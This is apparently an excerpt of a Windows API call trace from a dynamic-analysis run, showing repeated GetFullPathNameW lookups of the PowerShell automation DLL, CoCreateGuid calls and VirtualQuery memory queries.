	[0285.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.805] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2a7c849, Data2=0x66a9, Data3=0x453e, Data4=([0]=0xbc, [1]=0x15, [2]=0xd8, [3]=0xf8, [4]=0x82, [5]=0x1, [6]=0x34, [7]=0x63))) returned 0x0
	[0285.805] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x12c303cf, Data2=0x4dd2, Data3=0x40c5, Data4=([0]=0x84, [1]=0x79, [2]=0x70, [3]=0x26, [4]=0x20, [5]=0x72, [6]=0xa6, [7]=0x74))) returned 0x0
	[0285.805] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xe6c3e643, Data2=0xca9c, Data3=0x4ee0, Data4=([0]=0xa7, [1]=0xf9, [2]=0x84, [3]=0x77, [4]=0xfd, [5]=0x2f, [6]=0x21, [7]=0x4f))) returned 0x0
	[0285.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.806] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x3757eab5, Data2=0x104b, Data3=0x42f5, Data4=([0]=0x85, [1]=0xa9, [2]=0x2d, [3]=0x46, [4]=0x0, [5]=0xdb, [6]=0x43, [7]=0x4b))) returned 0x0
	[0285.806] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.807] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.807] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.808] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.808] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.809] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.809] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.809] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.809] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.591] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.591] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.592] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.592] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.592] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.592] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.593] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.593] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.593] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.593] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.593] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.593] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xe9d7ad09, Data2=0xa2e9, Data3=0x4712, Data4=([0]=0x89, [1]=0xd9, [2]=0x3a, [3]=0x9d, [4]=0x89, [5]=0xea, [6]=0x8a, [7]=0x43))) returned 0x0
	[0286.593] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.594] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.594] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.594] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.594] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.595] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.595] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.595] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.595] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
